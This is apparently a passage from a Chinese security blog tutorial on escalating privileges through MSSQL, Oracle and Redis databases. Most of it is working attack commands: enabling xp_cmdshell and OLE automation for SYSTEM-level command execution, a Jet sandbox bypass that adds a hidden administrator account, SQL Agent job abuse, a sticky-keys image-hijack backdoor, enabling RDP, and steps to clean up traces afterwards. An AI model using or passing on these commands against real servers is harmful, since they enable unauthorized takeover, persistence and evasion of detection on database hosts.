<h3 id="范围"><a href="#范围" class="headerlink" title="范围"></a>范围</h3><p>xp_cmdshell在<font color='red'><strong>MSSQL2005之后是关闭的</strong></font></p>
<p>但是</p>
<p>只要拥有数据库高权限，是可以手动开启的</p>
<figure class="highlight hsp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs hsp"><span class="hljs-keyword">EXEC</span> sp_configure <span class="hljs-string">&#x27;show advanced options&#x27;</span>, <span class="hljs-number">1</span>            <br>RECONFIGURE<span class="hljs-comment">;</span><br><span class="hljs-keyword">EXEC</span> sp_configure <span class="hljs-string">&#x27;xp_cmdshell&#x27;</span>, <span class="hljs-number">1</span><span class="hljs-comment">;</span><br>RECONFIGURE<span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure>



<h3 id="操作"><a href="#操作" class="headerlink" title="操作"></a>操作</h3><p>首先用高权限用户连接数据库，<font color='red'><strong>默认是可以远程连接的</strong></font></p>
<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230113130828175.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230113130828175</span></p>
<p>连接成功</p>
<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230113130951367.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230113130951367</span></p>
<p>首先是<font color='cornflowerblue'>查看是否存在</font>xp_cmdshell，因为它是有可能被删除</p>
<figure class="highlight axapta"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs axapta"><span class="hljs-keyword">select</span> <span class="hljs-keyword">count</span>(*)<span class="hljs-keyword">from</span> master.dbo.sysobjects <span class="hljs-keyword">where</span> xtype = <span class="hljs-string">&#x27;x&#x27;</span> and name = <span class="hljs-string">&#x27;xp_cmdshell&#x27;</span>;    <span class="hljs-meta">#返回1则存在</span><br></code></pre></td></tr></table></figure>



<p>删除之后，也是可以恢复的</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">exec</span> master.sys.sp_addextendedproc <span class="hljs-string">&#x27;xp_cmdshell&#x27;</span>, <span class="hljs-string">&#x27;C:\Program Files\Microsoft SQL</span><br><span class="hljs-string">Server\MSSQL\Binn\xplog70.dll&#x27;</span><br></code></pre></td></tr></table></figure>



<p>然后就是<font color='orange'>启用</font>xp_cmdshell</p>
<figure class="highlight gauss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs gauss"><span class="hljs-built_in">EXEC</span> sp_configure &#x27;<span class="hljs-keyword">show</span> advanced options&#x27;, <span class="hljs-number">1</span>;    <span class="hljs-meta">#允许修改高级参数</span><br>RECONFIGURE;<br><span class="hljs-built_in">EXEC</span> sp_configure &#x27;xp_cmdshell&#x27;, <span class="hljs-number">1</span>;            <span class="hljs-meta">#开启xp_cmdshell</span><br>RECONFIGURE;<br></code></pre></td></tr></table></figure>



<p>未开启</p>
<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230113131903948.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230113131903948</span></p>
<p>开启</p>
<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230113132031880.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230113132031880</span></p>
<p>关闭xp_cmdshell命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">exec</span> sp_configure <span class="hljs-string">&#x27;show advanced options&#x27;</span>, 1;<br>reconfigure;<br><span class="hljs-built_in">exec</span> sp_configure <span class="hljs-string">&#x27;xp_cmdshell&#x27;</span>, 0;<br>reconfigure;<br></code></pre></td></tr></table></figure>



<p>开启之后，就可以用xp_cmdshell执行命令，此时是以system权限执行命令的</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus">EXEC master<span class="hljs-selector-class">.dbo</span><span class="hljs-selector-class">.xp_cmdshell</span> <span class="hljs-string">&#x27;命令&#x27;</span><br></code></pre></td></tr></table></figure>

<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230113132125346.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230113132125346</span></p>
<p>提权成功</p>
<h3 id="总结-3"><a href="#总结-3" class="headerlink" title="总结"></a>总结</h3><p>总的来说，这种提权方式，就是用xp_cmdshell来执行命令</p>
<p>所有的操作都是围绕开启xp_cmdshell这个组件来展开的</p>
<h2 id="sp-oacreate提权"><a href="#sp-oacreate提权" class="headerlink" title="sp_oacreate提权"></a>sp_oacreate提权</h2><h3 id="原理-4"><a href="#原理-4" class="headerlink" title="原理"></a>原理</h3><p>sp_oacreate用来调用<font color='red'>OLE对象</font>，利用OLE对象的run方法执行系统命令</p>
<h3 id="条件"><a href="#条件" class="headerlink" title="条件"></a>条件</h3><p>数据库本身具有高权限，因为需要调用COM组件</p>
<p>大多用于xp_cmdshell组件被删除，不能使用xp_cmdshell方法</p>
<h3 id="操作-1"><a href="#操作-1" class="headerlink" title="操作"></a>操作</h3><p>首先还是查看sp_oacreate组件是否启用</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">declare</span> <span class="hljs-variable">@shell</span> <span class="hljs-type">int</span> <span class="hljs-keyword">exec</span> sp_oacreate <span class="hljs-string">&#x27;wscript.shell&#x27;</span>,<span class="hljs-variable">@shell</span> output <span class="hljs-keyword">exec</span> sp_oamethod <span class="hljs-variable">@shell</span>,<span class="hljs-string">&#x27;run&#x27;</span>,<span class="hljs-keyword">null</span>,<span class="hljs-string">&#x27;whoami&#x27;</span>;<br></code></pre></td></tr></table></figure>



<p>打开组件</p>
<figure class="highlight delphi"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs delphi">EXEC sp_configure <span class="hljs-string">&#x27;show advanced options&#x27;</span>, <span class="hljs-number">1</span>;       <br>RECONFIGURE <span class="hljs-keyword">WITH</span> <span class="hljs-keyword">OVERRIDE</span>;  <br>EXEC sp_configure <span class="hljs-string">&#x27;Ole Automation Procedures&#x27;</span>, <span class="hljs-number">1</span>;  <br>RECONFIGURE <span class="hljs-keyword">WITH</span> <span class="hljs-keyword">OVERRIDE</span>;  <br></code></pre></td></tr></table></figure>



<p>因为使用sp_oacreate组件执行命令时，是没有回显的</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">declare</span> <span class="hljs-variable">@shell</span> <span class="hljs-type">int</span> <span class="hljs-keyword">exec</span> sp_oacreate <span class="hljs-string">&#x27;wscript.shell&#x27;</span>,<span class="hljs-variable">@shell</span> output <span class="hljs-keyword">exec</span> sp_oamethod<br><span class="hljs-variable">@shell</span>,<span class="hljs-string">&#x27;run&#x27;</span>,<span class="hljs-keyword">null</span>,<span class="hljs-string">&#x27;c:\windows\system32\cmd.exe /c whoami &gt;c:\\1.txt&#x27;</span><br><br>#把结果保存到了	c:\\<span class="hljs-number">1.</span>txt<br></code></pre></td></tr></table></figure>

<p>把结果保存到文档里面，就可以读取了</p>
<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230113152811330.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230113152811330</span></p>
<p>没有任何回显</p>
<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230113152916704.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230113152916704</span></p>
<p>具有system权限</p>
<p>提权成功</p>
<h3 id="总结-4"><a href="#总结-4" class="headerlink" title="总结"></a>总结</h3><p>思路方法大致和xp_cmdshell差不多，就是调用sp_oacreate组件来执行命令</p>
<p>但是没有回显，不方便</p>
<p>还是优先使用xp_cmdshell来实现</p>
<h2 id="沙盒提权"><a href="#沙盒提权" class="headerlink" title="沙盒提权"></a>沙盒提权</h2><h3 id="原理-5"><a href="#原理-5" class="headerlink" title="原理"></a>原理</h3><p>沙盒模式是数据库的一种安装机制</p>
<p>开启沙盒模式时，只对控件和字段属性中的安全且不含恶意代码，才能执行</p>
<p>简而言之，就是不能执行恶意代码</p>
<h3 id="操作-2"><a href="#操作-2" class="headerlink" title="操作"></a>操作</h3><p>首先得知道，控制沙盒模式的参数    SandBoxMode</p>
<figure class="highlight autohotkey"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs autohotkey">`0`：在任何所有者中禁止启用安全模式<br>`1`：为仅在允许范围内<br>`2`：必须在access模式下<br>`3`：完全开启<br></code></pre></td></tr></table></figure>

<p>我们需要做的就是关闭沙盒模式，然后执行代码</p>
<p>用xp_regwrite这个存储这个存储过程对注册表进行写操作，关闭沙盒模式</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus">EXEC master<span class="hljs-selector-class">.dbo</span><span class="hljs-selector-class">.xp_regwrite</span> <span class="hljs-string">&#x27;HKEY_LOCAL_MACHINE&#x27;</span>,<span class="hljs-string">&#x27;SoftWare\Microsoft\Jet\4.0\Engines&#x27;</span>,<span class="hljs-string">&#x27;SandBoxMode&#x27;</span>,<span class="hljs-string">&#x27;REG_DWORD&#x27;</span>,<span class="hljs-number">0</span><br></code></pre></td></tr></table></figure>



<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230113161625252.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230113161625252</span></p>
<p>如果执行失败，应该是没有<font color='red'>打开允许修改高级参数</font>，打开后应该时可以关闭沙盒模式的</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">exec</span> sp_configure <span class="hljs-string">&#x27;show advanced options&#x27;</span>,1;reconfigure;<br><span class="hljs-built_in">exec</span> sp_configure <span class="hljs-string">&#x27;Ad Hoc Distributed Queries&#x27;</span>,1;reconfigure;<br></code></pre></td></tr></table></figure>



<p>查询是否关闭沙盒模式，但是经过测试发现，无论是否关闭，好像都是不影响我们执行语句的</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs stylus">exec master<span class="hljs-selector-class">.dbo</span><span class="hljs-selector-class">.xp_regread</span> <span class="hljs-string">&#x27;HKEY_LOCAL_MACHINE&#x27;</span>,<span class="hljs-string">&#x27;SOFTWARE\Microsoft\Jet\4.0\Engines&#x27;</span>,<br><span class="hljs-string">&#x27;SandBoxMode&#x27;</span><br></code></pre></td></tr></table></figure>

<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230113161656995.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230113161656995</span></p>
<p>关闭成功</p>
<p>添加管理员用户</p>
<figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs ada"><span class="hljs-keyword">select</span> * from<br>openrowset(<span class="hljs-symbol">&#x27;microsoft.jet.oledb.4.0</span><span class="hljs-string">&#x27;,&#x27;</span>;database=c:/windows/system32/ias/ias.mdb<span class="hljs-string">&#x27;,&#x27;</span><span class="hljs-keyword">select</span> shell(<span class="hljs-string">&quot;net user margin margin /add&quot;</span>)&#x27;)<br><br><span class="hljs-keyword">select</span> * from<br>openrowset(<span class="hljs-symbol">&#x27;microsoft.jet.oledb.4.0</span><span class="hljs-string">&#x27;,&#x27;</span>;database=c:/windows/system32/ias/ias.mdb<span class="hljs-string">&#x27;,&#x27;</span><span class="hljs-keyword">select</span> shell(<span class="hljs-string">&quot;net localgroup administrators margin /add&quot;</span>)&#x27;)<br></code></pre></td></tr></table></figure>

<p>然后就成功了</p>
<h3 id="痕迹清理-1"><a href="#痕迹清理-1" class="headerlink" title="痕迹清理"></a>痕迹清理</h3><figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs perl"><span class="hljs-comment">#删除用户</span><br><span class="hljs-keyword">select</span> * from<br>openrowset(<span class="hljs-string">&#x27;microsoft.jet.oledb.4.0&#x27;</span>,<span class="hljs-string">&#x27;;database=c:/windows/system32/ias/ias.mdb&#x27;</span>,<span class="hljs-string">&#x27;select shell(&quot;net user margin margin /del&quot;)&#x27;</span>)<br><br><span class="hljs-comment">#打开沙盒</span><br><span class="hljs-keyword">exec</span> master..xp_regwrite <span class="hljs-string">&#x27;HKEY_LOCAL_MACHINE&#x27;</span>,<span class="hljs-string">&#x27;SOFTWARE\Microsoft\Jet\4.0\Engines&#x27;</span>,<span class="hljs-string">&#x27;SandBoxMode&#x27;</span>,<span class="hljs-string">&#x27;REG_DWORD&#x27;</span>,<span class="hljs-number">1</span>;<br><br><span class="hljs-comment">#关闭高级设置修改</span><br><span class="hljs-keyword">exec</span> sp_configure <span class="hljs-string">&#x27;Ad Hoc Distributed Queries&#x27;</span>,<span class="hljs-number">0</span>;<br>reconfigure;<br><span class="hljs-keyword">exec</span> sp_configure <span class="hljs-string">&#x27;show advanced options&#x27;</span>,<span class="hljs-number">0</span>;<br>reconfigure;<br></code></pre></td></tr></table></figure>



<h3 id="总结-5"><a href="#总结-5" class="headerlink" title="总结"></a>总结</h3><p>沙盒提权，其实就是，关闭沙盒模式，来执行敏感语句</p>
<h2 id="JOB提权"><a href="#JOB提权" class="headerlink" title="JOB提权"></a>JOB提权</h2><h3 id="原理-6"><a href="#原理-6" class="headerlink" title="原理"></a>原理</h3><p>通过创建应该任务，来执行命令</p>
<h3 id="操作-3"><a href="#操作-3" class="headerlink" title="操作"></a>操作</h3><p>首先开启sqlagent服务</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">exec</span> master.dbo.xp_servicecontrol <span class="hljs-string">&#x27;start&#x27;</span>,<span class="hljs-string">&#x27;SQLSERVERAGENT&#x27;</span>;<br></code></pre></td></tr></table></figure>



<p>然后添加任务</p>
<figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs perl"><span class="hljs-keyword">use</span> msdb<br><br><span class="hljs-keyword">exec</span> sp_delete_job null,<span class="hljs-string">&#x27;x&#x27;</span><br><br><span class="hljs-keyword">exec</span> sp_add_job <span class="hljs-string">&#x27;x&#x27;</span><br></code></pre></td></tr></table></figure>



<p>通过任务来执行命令，将结果保存在    c:/1.txt</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">exec</span> sp_add_jobstep <span class="hljs-keyword">null</span>,<span class="hljs-string">&#x27;x&#x27;</span>,<span class="hljs-keyword">null</span>,<span class="hljs-string">&#x27;1&#x27;</span>,<span class="hljs-string">&#x27;cmdexec&#x27;</span>,<span class="hljs-string">&#x27;cmd /c &quot;ipconfig&gt;c:/1.txt&quot;&#x27;</span><br><br><span class="hljs-keyword">exec</span> sp_add_jobserver <span class="hljs-keyword">null</span>,<span class="hljs-string">&#x27;x&#x27;</span>,@<span class="hljs-variable">@servername</span><br><br><span class="hljs-keyword">exec</span> sp_start_job <span class="hljs-string">&#x27;x&#x27;</span>;<br></code></pre></td></tr></table></figure>

<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230113165411396.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230113165411396</span></p>
<p>任务启动成功</p>
<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230113165441060.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230113165441060</span></p>
<p>命令执行成功</p>
<h2 id="镜像劫持提权"><a href="#镜像劫持提权" class="headerlink" title="镜像劫持提权"></a>镜像劫持提权</h2><h3 id="原理-7"><a href="#原理-7" class="headerlink" title="原理"></a>原理</h3><p>通过使用<font color='cornflowerblue'><strong>xp_regwrite</strong></font>存储过程对注册表进行修改，替换成任意值，造成镜像劫持</p>
<h3 id="条件-1"><a href="#条件-1" class="headerlink" title="条件"></a>条件</h3><p>首先需要数据库<font color='red'>对注册表有写权限</font></p>
<p>其次就是xp_regwrite组件启用</p>
<h3 id="操作-4"><a href="#操作-4" class="headerlink" title="操作"></a>操作</h3><p>首先就是查看，<font color='red'>xp_regwrite是否开启</font></p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs pgsql"><span class="hljs-keyword">select</span> count(*) <span class="hljs-keyword">from</span> master.dbo.sysobjects <span class="hljs-keyword">where</span> xtype=<span class="hljs-string">&#x27;x&#x27;</span> <span class="hljs-keyword">and</span> <span class="hljs-type">name</span>=<span class="hljs-string">&#x27;xp_regwrite&#x27;</span><br></code></pre></td></tr></table></figure>

<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230113172155099.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230113172155099</span></p>
<p>发现已经开启</p>
<p><font color='red'>开启xp_regwrite</font></p>
<figure class="highlight hsp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs hsp"><span class="hljs-keyword">EXEC</span> sp_configure <span class="hljs-string">&#x27;show advanced options&#x27;</span>, <span class="hljs-number">1</span><br>RECONFIGURE<br><span class="hljs-keyword">EXEC</span> sp_configure <span class="hljs-string">&#x27;xp_regwrite&#x27;</span>,<span class="hljs-number">1</span><br>RECONFIGURE<br></code></pre></td></tr></table></figure>



<p>然后就可以<font color='red'>劫持注册表</font>来执行命令了，以连按5次粘滞键，弹出cmd框为例子</p>
<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs nginx"><span class="hljs-attribute">EXEC</span> master..xp_regwrite <span class="hljs-variable">@rootkey</span>=<span class="hljs-string">&#x27;HKEY_LOCAL_MACHINE&#x27;</span>,<span class="hljs-variable">@key</span>=<span class="hljs-string">&#x27;SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE&#x27;</span>,<span class="hljs-variable">@value_name</span>=<span class="hljs-string">&#x27;Debugger&#x27;</span>,<span class="hljs-variable">@type</span>=<span class="hljs-string">&#x27;REG_SZ&#x27;</span>,<span class="hljs-variable">@value</span>=<span class="hljs-string">&#x27;c:\windows\system32\cmd.exe&#x27;</span><br></code></pre></td></tr></table></figure>



<p>查看是否成功</p>
<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gams"><span class="hljs-function"><span class="hljs-title">exec</span></span> master..xp_regread <span class="hljs-string">&#x27;HKEY_LOCAL_MACHINE&#x27;</span>,<span class="hljs-string">&#x27;SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe&#x27;</span>,<span class="hljs-string">&#x27;Debugger&#x27;</span><br></code></pre></td></tr></table></figure>

<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230113172319349.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230113172319349</span></p>
<p>对应值正确</p>
<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230113172406442.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230113172406442</span></p>
<p>成功</p>
<p>删除连按5次粘滞键，弹出cmd框</p>
<figure class="highlight mathematica"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mathematica"><span class="hljs-type">xp_regdeletekey</span> <span class="hljs-operator">&#x27;</span><span class="hljs-type">HKEY_LOCAL</span><span class="hljs-type">_MACHINE</span><span class="hljs-operator">&#x27;,</span> <span class="hljs-operator">&#x27;</span><span class="hljs-variable">SOFTWARE</span>\<span class="hljs-variable">Microsoft</span>\<span class="hljs-variable">Windows</span> <span class="hljs-variable">NT</span>\<span class="hljs-variable">CurrentVersion</span>\<span class="hljs-built_in">Image</span> <span class="hljs-built_in">File</span> <span class="hljs-variable">Execution</span> <span class="hljs-built_in">Options</span>\<span class="hljs-variable">sethc</span><span class="hljs-operator">.</span><span class="hljs-variable">exe</span><span class="hljs-operator">&#x27;</span><br></code></pre></td></tr></table></figure>



<p>开启3389端口</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">exec master.dbo.xp_regwrit<span class="hljs-string">e&#x27;HKEY_LOCAL_MACHINE&#x27;</span>,<span class="hljs-string">&#x27;SYSTEM\CurrentControlSet\Control\Terminal Server&#x27;</span>,<span class="hljs-string">&#x27;fDenyTSConnections&#x27;</span>,<span class="hljs-string">&#x27;REG_DWORD&#x27;</span>,<span class="hljs-number">0</span>;<br><br>exec master..xp_cmdshell &quot;REG ADD &#x27;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server&#x27; /v fDenyTSConnections /t REG_DWORD /d 0&quot;<br><br>#一定要打开xp_cmdshell<br></code></pre></td></tr></table></figure>

<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230113172939766.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230113172939766</span></p>
<p>成功</p>
<h3 id="总结-6"><a href="#总结-6" class="headerlink" title="总结"></a>总结</h3><p>镜像劫持的本质，其实就是通过xp_regwrite组件来修改注册表，从而开启一些设置</p>
<h2 id="MSSQL提权总结"><a href="#MSSQL提权总结" class="headerlink" title="MSSQL提权总结"></a>MSSQL提权总结</h2><p>提权手段，大多都是通过mssql数据库的组件，基于mssql数据库本身具有的高权限，从而达到高权限执行命令</p>
<p>比较好用的是，<font color='red'><strong>沙盒提权</strong></font>，<font color='red'><strong>JOB提权</strong></font></p>
<p>其他的提权手段，是会被360等劫持的</p>
<h1 id="ORACLE"><a href="#ORACLE" class="headerlink" title="ORACLE"></a>ORACLE</h1><h2 id="介绍-1"><a href="#介绍-1" class="headerlink" title="介绍"></a>介绍</h2><p>oracle数据库是比较特殊的数据库</p>
<p>它是和jsp进行搭建，jsp脚本的特性，导致不需要提权，生成后门，就是system权限</p>
<p>它有三种提权模式</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs">普通用户模式<br><br>dba用户模式<br><br>注入模式<br></code></pre></td></tr></table></figure>



<h2 id="操作-5"><a href="#操作-5" class="headerlink" title="操作"></a>操作</h2><p>直接使用工具就行</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs awk">[oracle提权执行命令工具oracleShell v0.<span class="hljs-number">1</span>]<br><br>https:<span class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/jas502n/</span>oracleShell<br></code></pre></td></tr></table></figure>







<h1 id="Redis"><a href="#Redis" class="headerlink" title="Redis"></a>Redis</h1><h2 id="介绍-2"><a href="#介绍-2" class="headerlink" title="介绍"></a>介绍</h2><p>redis数据库，是一个开源的数据库</p>
<p>使用ANSI C语言编写</p>
<p>提供多种语言的API</p>
<h2 id="搭建redis数据库"><a href="#搭建redis数据库" class="headerlink" title="搭建redis数据库"></a>搭建redis数据库</h2><h3 id="安装redis数据库"><a href="#安装redis数据库" class="headerlink" title="安装redis数据库"></a>安装redis数据库</h3><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">wget</span> http://download.redis.io/releases/redis-<span class="hljs-number">3</span>.<span class="hljs-number">2</span>.<span class="hljs-number">5</span>.tar.gz<br><span class="hljs-attribute">tar</span> xzf redis-<span class="hljs-number">3</span>.<span class="hljs-number">2</span>.<span class="hljs-number">5</span>.tar.gz<br><span class="hljs-attribute">cd</span> redis-<span class="hljs-number">3</span>.<span class="hljs-number">2</span>.<span class="hljs-number">5</span><br><span class="hljs-attribute">make</span><br></code></pre></td></tr></table></figure>



<h3 id="设置远程访问"><a href="#设置远程访问" class="headerlink" title="设置远程访问"></a>设置远程访问</h3><figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs nginx"><span class="hljs-attribute">vim</span> redis.conf<br><br>bind <span class="hljs-number">127.0.0.1</span>前面加上<span class="hljs-comment">#号 或者设置为 0.0.0.0 支持其他ip地址访问</span><br><br>保护模式：protected-mode改为<span class="hljs-literal">no</span>，否则无法远程连接<br><br>设置后台运行：daemonize <span class="hljs-literal">yes</span><br><br>密码：修改requirepass xxxxx（你的密码）<br></code></pre></td></tr></table></figure>





<h3 id="端口发放"><a href="#端口发放" class="headerlink" title="端口发放"></a>端口发放</h3><p>首先需要去服务器开放6379端口</p>
<p>还需在本地设置</p>
